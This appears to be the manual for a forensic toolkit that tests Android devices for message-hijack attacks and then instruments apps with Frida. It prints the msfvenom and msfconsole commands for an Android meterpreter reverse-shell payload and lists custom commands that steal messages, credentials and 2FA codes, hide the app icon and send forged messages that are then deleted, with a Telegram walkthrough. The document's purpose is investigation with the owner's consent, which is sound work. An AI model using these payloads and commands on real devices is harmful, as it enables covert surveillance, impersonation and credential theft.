## Overview

UM is providing an Android device message hijack investigation toolkit so that investigators may assess devices for possible unlawful interception attacks. The usage of this toolkit requires collaboration with the owner of the device being investigated. The toolkit consists of 2 main components: a Memory forensics tool for device hijack investigations, and a supporting Android living-off-the-land (LoTL) pentest tool. The pentest tool extends the popular open-source Metasploit Framework, and the memory forensic tool utilises the open-source dynamic binary instrumentation framework, Frida. The figure below shows how the two components interact together. 




![alt_text](images/image1.png "image_tooltip")


Given an Android device from a trusted owner, the pentest tool (stages 1 and 2) allows an investigator to perform a preliminary risk assessment on the given device. This can be done through a set of custom metasploit commands developed for Locard (See appendix A). These stages determine whether or not the device is susceptible to message hijack attacks. If so, the investigator can then proceed with the memory forensic investigation using the memory forensics tool (stages 3 and 4) to forensically enhance the device under investigation and eventually extract relevant memory dumps produced by targeted apps. This toolkit will form part of Locard’s Investigator toolkit. While the current scope of this toolkit is limited to IM and SMS hijack scenarios, it can be extended for further scenarios. 


### Reconnaissance 

**<span style="text-decoration:underline;">Inputs</span>**: 



*   Physically connected device
*   Custom metasploit framework

**<span style="text-decoration:underline;">Output</span>**: 



*   Recon log including findings


#### Process



1. The reconnaissance phase requires setting up a metasploit reverse TCP listener, and generating a corresponding Android Payload. 

To start the TCP handler, inside the Metasploit framework directory, run the command:


```
./msfconsole -q -x 'use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost <SERVER_IP>;set LPORT <SERVER_PORT>;spool <DEST_LOG_FILE>; run'
```


![alt_text](images/image2.png "image_tooltip")


After running the command, the TCP listener will start listening on the specified socket:


![alt_text](images/image3.png "image_tooltip")




2. To generate the payload, inside metasploit framework directory, run command:

```
./msfvenom -p android/meterpreter/reverse_tcp LHOST=<SERVER_IP> LPORT=<SERVER_PORT> R > <PAYLOAD_DESTINATION>
```



![alt_text](images/image4.png "image_tooltip")


This will generate the payload.apk file in the specified target directory:



![alt_text](images/image5.png "image_tooltip")




3. Once the TCP listener is up and running, the investigator can install the payload on the target device. After opening the app, a reverse TCP session is established, and the investigator can now insert the metasploit commands:



![alt_text](images/image6.png "image_tooltip")



4. Below are some of the commands that are useful for reconnaissance (see full command list in Annex A): 
*   <strong><code>imei</code></strong>		</strong>Get device IMEI
*   <strong><code>app_list</code></strong>	List installed apps in the device
*   <strong><code>geolocate</code></strong>	Get current lat-long using geolocation
*   <strong><code>check_root</code></strong>	Check if device is rooted
*   <strong><code>sysinfo</code></strong>	Gets information about the remote system, such as OS
*   <strong><code>ps</code></strong>		List running processes
*   <strong><code>ipconfig</code></strong>	Display interfaces

For example, running <strong>imei</strong> will return the device’s International Mobile Equipment Identity (IMEI) number:


![alt_text](images/image7.png "image_tooltip")


Running the reconnaissance commands will display all of the device’s information on the `msfconsole`. All of the commands and outputs are logged in the specified directory.


### 


### Risk Assessment

**<span style="text-decoration:underline;">Input</span>**: 



*   Physically connected device with payload apk (from Stage 1 Step 3) installed

**<span style="text-decoration:underline;">Outputs</span>**: 



*   Risk Assessment Log 
*   Boolean (success/fail) to determine whether or not to go through with Stage 3


#### Process



1. Before launching the attacks, the investigator must enable accessibility services for the payload:



![alt_text](images/image8.png "image_tooltip")




2. The investigator can now simulate a number of message hijack, and related attacks, available through our custom extension of the Metasploit Framework:
*   **<code>acc_send_sms</code></strong> allows the investigator to send an SMS. This attack opens the default SMS app (<em>com.google.android.apps.messaging</em>), populates the number and message specified as parameters, and finally sends and deletes the message. 



![alt_text](images/image9.png "image_tooltip")




*   **<code>acc_send_im</code> </strong>allows the investigator to send an IM on different popular IM apps (Whatsapp: <em>com.whatsapp</em>, Telegram: <em>org.telegram.messenger</em>, and Signal: <em>org.thoughtcrime.securesms</em>). This attack opens the specified IM app specified as the <em>&lt;package_name></em> parameter, populates the number and message specified as parameters, and finally sends and deletes the message.




![alt_text](images/image10.png "image_tooltip")




*   **<code>acc_steal_im</code> </strong>allows the investigator to spy on a specific IM chat. This attack opens the specified IM app specified as the <em>&lt;package_name></em> parameter on the chat specified in the number parameter. The app then parses the content of the page and sends it to the meterpreter output. 



![alt_text](images/image11.png "image_tooltip")




![alt_text](images/image12.png "image_tooltip")


Besides these message hijack attacks, the tool also contains a number of attacks that can produce more elaborate attack scenarios. For example, the following sequence of steps can be executed in order to obtain an SMS hijack scenario by targeting PushBullet:



*   Force install: <strong><code>acc_install</code></strong> com.pushbullet.android
*   Enable permissions: <strong><code>acc_enable_permissions</code></strong> com.pushbullet.android SMS, Contacts, Phone, Storage
*   Add gmail account to phone:  <strong><code>acc_gmail_account</code></strong> [testaddress@gmail.com](mailto:testaddress@gmail.com) XXXXXXXXXXXX
*   Force login with newly added gmail account: <strong><code>acc_login_pushbullet</code></strong> [testaddress@gmail.com](mailto:testaddress@gmail.com)
*   Send sms from Pushbullet web:  <em>&lt;SMS> &lt;recipient></em> I confess, it was me
*   Delete SMS: <strong><code>acc_delete_sms</code></strong> <em>&lt;recipient></em> "I confess, it was me"

The success or failure of these attacks can prompt the investigator to forensically enhance the device under investigation by targeting apps that are suspected to be victims of a message hijack.   


### Forensic enhancement

**<span style="text-decoration:underline;">Inputs</span>**: 



*   Physically connected device with target/susceptible apk, 
*   Forensic enhancement driver

**<span style="text-decoration:underline;">Outputs</span>**: 



*   Forensically enhanced device, 
*   Forensic enhancement log


#### Process

The diagram below shows the overall steps that are required in this stage of the toolkit.


![alt_text](images/image13.png "image_tooltip")

1. The results from Stage 2 allow the investigator to identify a suspicious app that may be susceptible to an unlawful interception attack. The investigator may grab a copy of this app from the device by using the following command provided by the memory forensics toolkit, whereby `jitmf` is the name of the memory forensics tool:

```
(env) pc@ubuntu:~/$ jitmf grabapks <dir> <pkg> —help

Usage: jitmf grabapks [OPTIONS]

Options:
  -dir TEXT  Directory to store suspicious apks
  -pkg TEXT  Specific apk to grab. If not specified pulls all.
  --help     Show this message and exit.
```


2. Next, the investigator must provide the toolkit with a configuration driver. This driver must at least contain the following information:
    1. The app that is being investigated
    2. The attack scenario
    3. Whether the evidence generated is to be sent to the investigator over the network in real time or pulled directly from the device on an agreed upon date by both the device owner and investigator.

Using this information, the memory forensics tool can generate a custom Frida script. This script contains commands to dump specific regions in memory when certain events, related to the attack scenario, occur. For instance, in the case of a message hijack attack on an app called Pushbullet, the Frida script generated would contain instructions to dump certain memory regions during runtime, when a “SEND_SMS” event occurs. 

Currently the toolkit offer drivers for the four scenarios described below, out of the box:


<table>
  <tr>
   <td>
   </td>
   <td><strong><span style="text-decoration:underline;">App</span></strong>
   </td>
   <td><strong><span style="text-decoration:underline;">Attack Scenario</span></strong>
   </td>
  </tr>
  <tr>
   <td><strong>Driver 1</strong>
   </td>
   <td>Pushbullet
   </td>
   <td>Stealthy message hijack
   </td>
  </tr>
  <tr>
   <td><strong>Driver 2</strong>
   </td>
   <td>Pushbullet
   </td>
   <td>Stealthy message spying
   </td>
  </tr>
  <tr>
   <td><strong>Driver 3</strong>
   </td>
   <td>Telegram
   </td>
   <td>Stealthy message hijack
   </td>
  </tr>
  <tr>
   <td><strong>Driver 4</strong>
   </td>
   <td>Telegram
   </td>
   <td>Stealthy message spying
   </td>
  </tr>
</table>


This being said, the tool is extensible and supports enhancing any messaging app and scenario, if given a driver. For instance, if an investigator wishes to forensically enhance the Signal app in the case of suspected messaging hijack attack, a driver for that scenario must be compiled and provided as an argument to the forensic tool. Appendix B shows the Frida script generated from Driver 1.

The investigator can then invoke the following command to inject the generated script in the original app, repackage it (step 3), uninstall the old version of the app and re-install the forensically enhanced version of the app (step 4). The following command allows the app to be forensically enhanced without needing to root the device. 


```
(env) pc@ubuntu:~/$ jitmf patchapk —help
Usage: jitmf patchapk [OPTIONS]
Options:
  -apk_src TEXT  Location of source apk  [required]
  -hook TEXT     Generated Frida script to inject [required]
  -network TEXT  Boolean Y/N [required]
  -vfrida TEXT   Version of Frida you'd like to work with
  --install      Install the apk
  --help         Show this message and exit.
```


Along with the forensically enhanced app, this step produces a “Forensic enhancement log”. This log contains the commands executed on the device as well as a hash of the forensically enhanced app.


    5) The investigator gives the forensically enhanced device back to the owner, for continued normal usage. While using the app, the Frida script would be generating memory dumps (if events occur) and storing them on external storage.


### Data collection and Analysis

**<span style="text-decoration:underline;">Inputs</span>**: 



*   Logs produced by every stage of toolkit
*   Forensic collection driver
*   Memory dumps extracted from the device
*   External supplementary evidence
*   Physically connected device 

**<span style="text-decoration:underline;">Outputs</span>**: 



*   Full forensic timeline of events
*   Timeline of suspicious events
*   Aggregated log including all the commands executed on the device at every stage - to be supplied to chain of custody
*   Set of raw artifacts generated by every stage


#### Process



1. The generated memory dumps are either pulled from the device using the command below, or obtained by the investigator over the network - depending on the agreement between the owner and the investigator.

```
(env) pc@ubuntu:~/$ jitmf pulldumps --help
Usage: jitmf pulldumps [OPTIONS]
Options:
  -path TEXT    Path of output
  --help           Show this message and exit.
```


2. The investigator generates a driver containing at least the following information:
    1. The app that is being investigated
    2. The attack scenario
    3. Directory of supplementary of evidence
    4. How to use the supplementary evidence to draw conclusions about events that may be related to an attack.

The investigator may choose to supply additional supplementary evidence to the tool so that it can highlight certain events, specifically, that may be suspicious. Regardless of whether or not the investigator chooses to use this functionality, the tool generated a full timeline of the events that occurred on the device while under investigation.



3. The following command in the memory forensics tool can be used to parse and filter the dumps created and produce a forensic timeline.

```
(env) pc@ubuntu:~/$ jitmf analysedumps --help
Usage: jitmf analysedumps [OPTIONS]
Options:
  -suspdataf TEXT  Text file containing suspicious data
  -driver TEXT     Location of driver file [required]
  -path TEXT       Path of output
  --help           Show this message and exit.
```



The output of this step is a JSONL file, describing a timeline of events, that can be further analysed by the investigator to determine whether or not the device was under attack, while being used by the owner. Multiple timelines can be generated depending on the details within the supplied driver and the additional supplementary evidence. Samples of the different timelines that can be generated can be seen in Appendix C.

The investigator can use the JSONL output of the memory forensics tool and use widely-available tools, like Timesketch ([https://github.com/google/timesketch](https://github.com/google/timesketch)), to produce a more user-friendly version of the timeline similar to the below:


![alt_text](images/image14.png "image_tooltip")

4. The investigator uses the following command to aggregate logs generated from every stage and sends them to Locard storage - via an API request.

```
(env) pc@ubuntu:~/$ jitmf sendlogs --help
Usage: jitmf analysedumps [OPTIONS]
Options:
  -logdir TEXT     Directory containing all log files generated
  -apitoken TEXT   API token to communicate with LOCARD storage [required]
  -URL:port TEXT   Where to send this request
  --help           Show this message and exit.
```


5. The investigator uses the following command to push all artifacts generated, including timelines, enhanced apk, recon logs - via an SFTP connection.

```
(env) pc@ubuntu:~/$ jitmf sendartifacts --help
Usage: jitmf analysedumps [OPTIONS]
Options:
  -artdir TEXT     Directory containing all artifacts generated
  -token TEXT      Auth token to communicate with LOCARD storage [required]
  -sftp TEXT       SFTP connection details
  --help           Show this message and exit.
```




## Walkthrough scenario: Unlawful interception case study

Here we will demonstrate a walkthrough of a hypothetical scenario where a high profile target was a potential victim of a telegram hijack. In this scenario, the investigator will obtain the victim’s device and perform the investigation using the Android device message hijack investigation toolkit. In summary, the investigator will go through the following steps:



1. Reconnaissance 
    *   Obtain the victim’s device
    *   Set up the reverse TCP listener
    *   Generate payload
    *   Install payload
    *   Launch recon commands
2. Risk Assessment
    *   After confirming that telegram is on the device, perform telegram hijack to confirm that the device is vulnerable to this kind of attack. 
3. Forensic enhancement
    *   Using the Telegram message hijack driver (Driver 3), generate a Frida script 
    *   Repackage the app to include the generated script and re-install the app on the device owner’s phone.
    *   Give the device back to its owner to continue using normally
4. Data collection and Analysis
    *   Pull logs
    *   Generate timelines
    *   Forward generated artifacts and logs* to Locard

*At the end of each stage a log file containing the executed commands is generated and stored locally on the investigator’s machine. These are then picked up by stage 4 to push to Locard’s central repository/storage for evidence collection and chain of custody usage.


### 


### Reconnaissance

After obtaining the victim’s device, the investigator initiates the TCP listener:




![alt_text](images/image15.png "image_tooltip")


The investigator then generates a payload with the corresponding socket information:



![alt_text](images/image16.png "image_tooltip")


The payload is installed on the victim’s device. Once the investigator clicks on the payload icon, the reverse TCP session is initiated:



![alt_text](images/image17.png "image_tooltip")


The investigator runs the relevant recon commands:


![alt_text](images/image18.png "image_tooltip")

The generated outputs are stored in the directory specified by the investigator:


![alt_text](images/image19.png "image_tooltip")

The recon logs clearly show that telegram is installed on the device:


![alt_text](images/image20.png "image_tooltip")


### Risk Assessment

In order to perform the hijack attacks, the investigar must enable accessibility service:

![alt_text](images/image21.png "image_tooltip")

The investigator launches the attack using the command: 



*   **acc_send_im org.telegram.messenger yonlegs “I confess to the crime”**


![alt_text](images/image22.png "image_tooltip")


This forces telegram to open, and send a message with the text “I confess to the crime” to the telegram user “yonlegs”. The message is then deleted instantly, and Telegram is minimised:



![alt_text](images/image23.gif "image_tooltip")


The investigator can see that the attack was successful. This calls for further investigation of the case by 


### Forensic Enhancement

Grab the apk and save it locally to ~/susp_apps


```
(env) pc@ubuntu:~/$ jitmf grabapks -dir=~/susp_apps pkg=org.telegram.messenger
```


Forensically enhance the app and install it on the user’s phone. The forensically enhanced app is named as:` org.telegram.messenger.jitmf.apk. `A hash will be generated for it and logged.


```
(env) pc@ubuntu:~/$ jitmf -apk_src=~/susp_apps -hook=~/telegram_msghijack.js -network=false --install
```


After enhancing the device, we can test another telegram hijack attack to see if the suspicious messages are being caught by the memory forensics tool:



![alt_text](images/image24.png "image_tooltip")


After the message was sent, we can see log files being generated:




![alt_text](images/image25.png "image_tooltip")


Even though the attack deleted the message straight after sending it, the memory forensics tool was still able to capture the event and store it. 




![alt_text](images/image26.png "image_tooltip")




![alt_text](images/image27.png "image_tooltip")



### 


### Data collection and Analysis

The investigator can then pull the dumps generated on the phone as follows:


```
(env) pc@ubuntu:~/$ jitmf pulldumps -path=~/<CASENO>/telegram/HASH/dumps_output
```


And create a forensic timeline using this command.


```
(env) pc@ubuntu:~/$ jitmf analysedumps -path=~/<CASENO>/telegram/HASH/timelines -suspdataf=~/<CASENO>/telegram/HASH/aux_network_logs -driver=~/<CASENO>/telegram/HASH/correlation_driver.txt
```



    Logs and artifacts generated would be sent using these commands respectively:


```
(env) pc@ubuntu:~/$ jitmf sendlogs -logdir= ~/<CASENO>/telegram/HASH/locard_logs -apitoken=<ACCESS_TOKEN> -<sftp_connection=<SFTP>
```



## Appendix A - Meterpreter commands:

Below are all the commands available to the investigator once the payload is installed. Note that the commands in red are the custom commands developed for Locard. 

Core Commands

=============

    Command                   Description

    -------                   -----------

    ?                         Help menu

    background                Backgrounds the current session

    bg                        Alias for background

    bgkill                    Kills a background meterpreter script

    bglist                    Lists running background scripts

    bgrun                     Executes a meterpreter script as a background thread

    channel                   Displays information or control active channels

    close                     Closes a channel

    disable_unicode_encoding  Disables encoding of unicode strings

    enable_unicode_encoding   Enables encoding of unicode strings

    exit                      Terminate the meterpreter session

    get_timeouts              Get the current session timeout values

    guid                      Get the session GUID

    help                      Help menu

    info                      Displays information about a Post module

    irb                       Open an interactive Ruby shell on the current session

    load                      Load one or more meterpreter extensions

    machine_id                Get the MSF ID of the machine attached to the session

    pry                       Open the Pry debugger on the current session

    quit                      Terminate the meterpreter session

    read                      Reads data from a channel

    resource                  Run the commands stored in a file

    run                       Executes a meterpreter script or Post module

    secure                    (Re)Negotiate TLV packet encryption on the session

    sessions                  Quickly switch to another session

    set_timeouts              Set the current session timeout values

    sleep                     Force Meterpreter to go quiet, then re-establish session.

    transport                 Change the current transport mechanism

    use                       Deprecated alias for "load"

    uuid                      Get the UUID for the current session

    write                     Writes data to a channel

Stdapi: File system Commands

============================

    Command       Description

    -------       -----------

    cat           Read the contents of a file to the screen

    cd            Change directory

    checksum      Retrieve the checksum of a file

    cp            Copy source to destination

    dir           List files (alias for ls)

    download      Download a file or directory

    edit          Edit a file

    getlwd        Print local working directory

    getwd         Print working directory

    lcd           Change local working directory

    lls           List local files

    lpwd          Print local working directory

    ls            List files

    mkdir         Make directory

    mv            Move source to destination

    pwd           Print working directory

    rm            Delete the specified file

    rmdir         Remove directory

    search        Search for files

    upload        Upload a file or directory

Stdapi: Networking Commands

===========================

    Command       Description

    -------       -----------

    ifconfig      Display interfaces

    ipconfig      Display interfaces

    portfwd       Forward a local port to a remote service

    route         View and modify the routing table

Stdapi: System Commands

=======================

    Command       Description

    -------       -----------

    execute       Execute a command

    getuid        Get the user that the server is running as

    localtime     Displays the target system's local date and time

    pgrep         Filter processes by name

    ps            List running processes

    shell         Drop into a system command shell

    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

===============================

    Command       Description

    -------       -----------

    screenshare   Watch the remote user's desktop in real time

    screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands

=======================

    Command        Description

    -------        -----------

    record_mic     Record audio from the default microphone for X seconds

    webcam_chat    Start a video chat

    webcam_list    List webcams

    webcam_snap    Take a snapshot from the specified webcam

    webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands

=============================

    Command       Description

    -------       -----------

    play          play an audio file on target system, nothing written on disk

Android Commands

================

    Command                    Description

    -------                    -----------

    acc_default_sms            Set app as default SMS app (Accessibility Attack)

    acc_delete_sms             Delete SMS (Accessibility Attack)

    acc_disable_notifications  Disable Notifications (Accessibility Attack)

    acc_enable_permissions     Enable Permissions (Accessibility Attack)

    acc_gmail_account          Add Gmail Account (Accessibility Attack)

    acc_install                Install App (Accessibility Attack)

    acc_launch_close           Launch and minimise app (Accessibility Attack)

    acc_login_pushbullet       Login Pushbullet (Accessibility Attack)

    acc_login_teamviewer       Login Teamviewer (Accessibility Attack)

    acc_send_im                Send IM (Accessibility Attack)

    acc_send_sms               Send SMS (Accessibility Attack)

    acc_steal_2fa              Steal 2FA from Google authenticator (Accessibility Attack)

    acc_steal_creds            Steal Credentials obtained through overlay attack (Accessibility Attack)

    acc_steal_im               Steal IM (Accessibility Attack)

    acc_uninstall              Uninstall App (Accessibility Attack)

    activity_start             Start an Android activity from a Uri string

    check_root                 Check if device is rooted

    dump_calllog               Get call log

    dump_contacts              Get contacts list

    dump_sms                   Get sms messages

    geolocate                  Get current lat-long using geolocation

    hide_app_icon              Hide the app icon from the launcher

    imei                       Get device IMEI

    interval_collect           Manage interval collection capabilities

    send_sms                   Sends SMS from target session

    set_audio_mode             Set Ringer Mode

    sqlite_query               Query a SQLite database from storage

    wakelock                   Enable/Disable Wakelock

    wlan_geolocate             Get current lat-long using WLAN information

Application Controller Commands

===============================

    Command        Description

    -------        -----------

    app_install    Request to install apk file

    app_list       List installed apps in the device

    app_run        Start Main Activty for package name

    app_uninstall  Request to uninstall application


## Appendix B - Driver 1 Generated Frida script


```
Java.perform(function(){   
    var Log = Java.use("android.util.Log");    
    var smsManager = Java.use("android.telephony.SmsManager")      
    var onSendMessage = smsManager.sendTextMessage.overload("java.lang.String", "java.lang.String", "java.lang.String", "android.app.PendingIntent", "android.app.PendingIntent")         
    onSendMessage.implementation = function(u0, u1, u2, u3, u4) {      
        const Debug = Java.use("android.os.Debug"); 
        var timestamp = Date.now(); 


        const Env = Java.use("android.os.Environment") 
        var dir = Env.getExternalStorageDirectory().getAbsolutePath() 
        Log.v("frida-lief", "Writing to: "+dir+"/sendSMS_dump_"+timestamp+".hprof") 
        Debug.dumpHprofData(dir+"/sendSMS_dump_"+timestamp+".hprof");   


        onSendMessage.call(this,u0, u1, u2, u3, u4)      
    }  
```



## Appendix C - Forensic logs and timelines

The forensically enhanced app generates the following types of files when an important event (as defined in the driver) occurs:



*   *.hprof
*   *.jitmfheaplog
*   *.jitmflog

    Hprof files consist of raw memory dumps taken at the time that an event occurs. Jitmfheaplog files log the time at which an event occurs and the associated heap dump which may contain evidence of an attack. A timeline can be generated from this data, as shown in the figure below.


![alt_text](images/image28.png "image_tooltip") 

Jitmflog files contain filtered data from hprof dumps, which filter objects in memory, at runtime, which may be of interest. Data of interest in memory is identified by the driver supplied by the investigator (i.e. running `analysedumps` command with a driver).  The data in this file is less verbose. The following is a filtered JSONL timeline, which contains extracted data objects of interest only from memory. 



![alt_text](images/image29.png "image_tooltip")


The below image shows the outputted JSONL timeline that is produced when the investigator supplies the tool with a driver that contains filtering instructions as well as supplementary data and correlation instructions. In this case a text file with suspicious phone numbers was given to tools. The timeline generated includes events during which the supplied phone numbers were featured/used. The tool uses the generated memory dumps and log files to create a timeline including only matched evidence.


![alt_text](images/image30.png "image_tooltip")